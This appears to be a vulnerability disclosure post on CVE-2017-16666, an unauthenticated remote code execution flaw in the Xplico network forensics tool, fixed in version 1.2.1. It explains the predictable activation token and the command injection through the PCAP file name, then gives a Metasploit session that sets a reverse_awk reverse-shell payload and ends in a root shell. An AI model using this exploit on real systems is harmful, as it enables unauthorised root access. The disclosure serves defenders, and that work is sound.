CVE-2017-16666: Xplico Unauthenticated Remote Code Execution

Xplico is a Network Forensic Analysis Tool (NFAT). The goal of Xplico is extracted from an internet traffic capture the application’s data contained. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP, RTP), IRC, MSN…
Xplico is able to classify more than 140 (application) protocols. Xplico can be used as sniffer-decoder if used in “live mode” or in conjunction with netsniff-ng.

CVE-2017-16666 information

Remotely Exploitable: Yes
Authentication Required: NO
Vendor URL: www.xplico.org
CVSSv3 Score: 9.0 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:U)
Date of found: 31 Oct 2017

Solution

Xplico released version 1.2.1

xplico_exec Metasploit module

This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.

The specific flaw exists within the Xplico, which listens on TCP port 9876 by default. The goal of Xplico is extracted from an internet traffic capture the application’s data contained. There is a hidden end-point at an inside of the Xplico that allows anyone to create a new user. Once the user created through /users/register endpoint, it must be activated via activation e-mail. After the registration Xplico tries to send an e-mail that contains activation code. Unfortunately, this e-mail probably not gonna reach to the given e-mail address on most of the installation. But it’s possible to calculate exactly same token value because of insecure cryptographic random string generator function usage. One of the features of Xplico is related to the parsing PCAP files. Once PCAP file uploaded, Xplico executes an operating system command in order to calculate the checksum of the file. Name of the for this operation is directly taken from user input and then used at the inside of the command without proper input validation.

msf > use exploit/linux/http/securityonion_xplico_exec

msf exploit(securityonion_xplico_exec) > set RHOST 12.0.0.30

RHOST => 12.0.0.30

msf exploit(securityonion_xplico_exec) > 

msf exploit(securityonion_xplico_exec) > exploit 



[-] Exploit failed: A payload has not been selected.

[*] Exploit completed, but no session was created.

msf exploit(securityonion_xplico_exec) > set payload cmd/unix/

set payload cmd/unix/generic set payload cmd/unix/reverse_netcat

set payload cmd/unix/reverse_awk 

msf exploit(securityonion_xplico_exec) > set payload cmd/unix/reverse_awk 

payload => cmd/unix/reverse_awk

msf exploit(securityonion_xplico_exec) > set LHOST 12.0.0.1 

LHOST => 12.0.0.1

msf exploit(securityonion_xplico_exec) > exploit 



[*] Started reverse TCP handler on 12.0.0.1:4444 

[*] Initiating new session on server side

[*] Registering a new user

[] New user successfully registered

[*] Username: mwbvnyowr

[*] Password: gHPkAvCTXFDVcfTwaAmfoJUoMNHNDIDT

[*] Calculating em_key code of the user

[*] Activating user with em_key = 159d4af63472e2a47e3f3c5c11205a5e

[] User successfully activated

[*] Authenticating with our activated new user

[] Successfully authenticated

[*] Creating new case

[] New Case successfully created. Our pol_id = 36

[*] Creating new xplico session for pcap

[] New Sols successfully created. Our sol_id = 54

[*] Uploading malformed PCAP file

[] PCAP successfully uploaded. Pcap parser is going to start on the server side.

[*] Parsing has started. Wait for the parser to get the job done...

[] We are at PCAP decoding phase. Little bit more patience...

[] We are at PCAP decoding phase. Little bit more patience...

[] We are at PCAP decoding phase. Little bit more patience...

[*] Command shell session 1 opened (12.0.0.1:4444 -> 12.0.0.30:39782) at 2017-11-08 14:44:52 0300



id

uid=0(root) gid=0(root) groups=0(root)

```

Source: pentest.blog